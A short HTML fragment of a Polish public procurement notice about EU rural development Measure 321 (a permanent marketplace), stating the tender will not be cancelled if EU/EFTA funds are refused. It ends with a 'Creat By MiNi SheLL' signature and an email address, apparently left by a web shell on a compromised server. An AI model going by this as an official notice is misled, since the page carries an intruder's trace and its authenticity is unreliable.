Działanie 321 - Podstawowe usługi dla gospodarki i ludności wiejskiej,
 w zakresie budwy, przebudowy, remontu lub wyposażenia targowiska stałego.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com